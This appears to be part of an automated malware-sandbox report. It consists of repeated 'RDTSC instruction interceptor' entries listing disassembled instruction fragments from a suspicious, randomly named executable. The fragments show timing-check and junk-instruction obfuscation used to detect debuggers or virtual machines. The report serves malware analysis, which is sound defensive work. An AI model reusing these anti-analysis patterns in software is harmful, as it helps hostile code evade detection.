Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240495 second address: 5240512 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0738B194DCh 0x00000012 and ax, C4F8h 0x00000017 jmp 00007F0738B194DBh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F0738B194E8h 0x00000023 xor esi, 01D21F58h 0x00000029 jmp 00007F0738B194DBh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ebp 0x00000031 jmp 00007F0738B194E6h 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F0738B194DAh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240512 second address: 5240518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240518 second address: 524051E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 524051E second address: 5240522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280E0F second address: 5280E1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280E1D second address: 5280E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280E21 second address: 5280E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280E25 second address: 5280E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280E2B second address: 5280E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280E31 second address: 5280E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280E35 second address: 5280E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F0738B194DEh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F0738B194DEh 0x0000001a and ch, FFFFFFF8h 0x0000001d jmp 00007F0738B194DBh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 call 00007F0738B194E6h 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 526045C second address: 5260471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 0DD5EDFFh 0x00000008 mov cx, 6B1Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260471 second address: 52604AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, B8h 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F0738B194DAh 0x0000000f pop esi 0x00000010 mov dh, 67h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F0738B194DAh 0x00000019 mov ebp, esp 0x0000001b jmp 00007F0738B194E0h 0x00000020 mov eax, dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52604AF second address: 52604CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52604CC second address: 5260502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0738B194E7h 0x00000008 mov bx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and dword ptr [eax], 00000000h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0738B194E1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260502 second address: 526052A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0738AFBE5Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240666 second address: 524066D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 524066D second address: 524067B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 524067B second address: 524067F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 524067F second address: 5240685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5240685 second address: 52406FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0738B194DEh 0x00000013 sub ax, 6178h 0x00000018 jmp 00007F0738B194DBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F0738B194E8h 0x00000024 xor ecx, 4BAFFBD8h 0x0000002a jmp 00007F0738B194DBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F0738B194E5h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260019 second address: 5260050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0738AFBE5Eh 0x0000000f push eax 0x00000010 jmp 00007F0738AFBE5Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260050 second address: 5260054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260054 second address: 526006F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 526006F second address: 5260075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260075 second address: 5260079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260079 second address: 526007D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 526007D second address: 5260093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0738AFBE5Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5260093 second address: 52600AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov dl, 63h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0738B194DBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 528067A second address: 5280680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280680 second address: 5280684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280684 second address: 5280688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280688 second address: 52806A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0738B194E5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52806A8 second address: 52806AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52806AE second address: 52806B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52806B2 second address: 52806FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F0738AFBE66h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0738AFBE67h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52806FF second address: 5280728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop esi 0x0000000f mov edx, 387DAAFAh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280728 second address: 528074D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0738AFBE5Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 528074D second address: 5280772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0738B194E2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280772 second address: 52807B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, esi 0x00000008 popad 0x00000009 mov eax, dword ptr [774365FCh] 0x0000000e pushad 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 mov ch, bl 0x00000014 popad 0x00000015 popad 0x00000016 test eax, eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F0738AFBE62h 0x00000021 xor esi, 6FF0D558h 0x00000027 jmp 00007F0738AFBE5Bh 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52807B2 second address: 52807EC instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F0738B194E4h 0x0000000b movzx esi, di 0x0000000e pop edx 0x0000000f popad 0x00000010 je 00007F07AAC4C66Bh 0x00000016 pushad 0x00000017 mov cx, 0BEFh 0x0000001b mov al, 78h 0x0000001d popad 0x0000001e mov ecx, eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov eax, 06B6CEDFh 0x00000028 mov cl, 79h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52807EC second address: 528087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F0738AFBE61h 0x00000011 and ecx, 1Fh 0x00000014 pushad 0x00000015 call 00007F0738AFBE5Ch 0x0000001a pushfd 0x0000001b jmp 00007F0738AFBE62h 0x00000020 and cx, 1ED8h 0x00000025 jmp 00007F0738AFBE5Bh 0x0000002a popfd 0x0000002b pop esi 0x0000002c mov di, 2C1Ch 0x00000030 popad 0x00000031 ror eax, cl 0x00000033 jmp 00007F0738AFBE5Bh 0x00000038 leave 0x00000039 jmp 00007F0738AFBE66h 0x0000003e retn 0004h 0x00000041 nop 0x00000042 mov esi, eax 0x00000044 lea eax, dword ptr [ebp-08h] 0x00000047 xor esi, dword ptr [00921014h] 0x0000004d push eax 0x0000004e push eax 0x0000004f push eax 0x00000050 lea eax, dword ptr [ebp-10h] 0x00000053 push eax 0x00000054 call 00007F073D49CCA9h 0x00000059 push FFFFFFFEh 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 528087B second address: 5280881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5280881 second address: 52808C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F0738AFBE60h 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007F073D49CCDAh 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a mov ecx, 0E8C2B0Dh 0x0000001f mov ax, 6B09h 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 mov ecx, 362A7241h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230012 second address: 5230039 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0738B194E5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230039 second address: 5230049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738AFBE5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230049 second address: 52300AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0738B194DFh 0x00000013 or ax, 435Eh 0x00000018 jmp 00007F0738B194E9h 0x0000001d popfd 0x0000001e mov di, si 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0738B194E9h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52300AB second address: 52300B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52300B1 second address: 52300FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0738B194E5h 0x00000011 or ax, 45A6h 0x00000016 jmp 00007F0738B194E1h 0x0000001b popfd 0x0000001c mov ecx, 776A1CD7h 0x00000021 popad 0x00000022 and esp, FFFFFFF8h 0x00000025 pushad 0x00000026 mov ax, CFCFh 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52300FB second address: 52300FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52300FF second address: 5230103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230103 second address: 5230120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0738AFBE63h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230120 second address: 5230174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 pushfd 0x00000011 jmp 00007F0738B194DFh 0x00000016 add ax, 339Eh 0x0000001b jmp 00007F0738B194E9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230174 second address: 52301BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F0738AFBE5Eh 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F0738AFBE60h 0x00000015 push eax 0x00000016 jmp 00007F0738AFBE5Bh 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52301BE second address: 5230206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c jmp 00007F0738B194E0h 0x00000011 xchg eax, esi 0x00000012 jmp 00007F0738B194E0h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F0738B194DCh 0x00000020 pop ecx 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230206 second address: 5230230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0738AFBE67h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230230 second address: 5230248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738B194E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230248 second address: 5230292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f call 00007F0738AFBE64h 0x00000014 mov dh, ch 0x00000016 pop edi 0x00000017 mov eax, 29BD4223h 0x0000001c popad 0x0000001d xchg eax, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0738AFBE65h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230292 second address: 5230298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230298 second address: 52302A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52302A6 second address: 52302AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52302AE second address: 52302B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52302B4 second address: 52302B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52302B8 second address: 52302BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52302BC second address: 52302EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007F0738B194E0h 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 mov cl, E4h 0x00000013 mov si, di 0x00000016 popad 0x00000017 je 00007F07AAC9780Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov si, EA7Dh 0x00000024 movzx esi, bx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52302EF second address: 523038C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 movzx ecx, bx 0x00000014 mov dh, 54h 0x00000016 popad 0x00000017 je 00007F07AAC7A16Ch 0x0000001d jmp 00007F0738AFBE62h 0x00000022 mov edx, dword ptr [esi+44h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F0738AFBE5Eh 0x0000002c and eax, 5082DA18h 0x00000032 jmp 00007F0738AFBE5Bh 0x00000037 popfd 0x00000038 mov esi, 59E36DCFh 0x0000003d popad 0x0000003e or edx, dword ptr [ebp+0Ch] 0x00000041 jmp 00007F0738AFBE62h 0x00000046 test edx, 61000000h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F0738AFBE67h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 523038C second address: 52303CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F07AAC977C8h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0738B194E8h 0x00000019 sbb cl, 00000038h 0x0000001c jmp 00007F0738B194DBh 0x00000021 popfd 0x00000022 mov ah, 73h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52303CA second address: 52303DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738AFBE61h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52303DF second address: 523043A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f jmp 00007F0738B194DEh 0x00000014 jne 00007F07AAC9776Fh 0x0000001a jmp 00007F0738B194E0h 0x0000001f test bl, 00000007h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0738B194E7h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 523043A second address: 5230440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230440 second address: 5230444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52208FD second address: 5220901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220901 second address: 5220907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
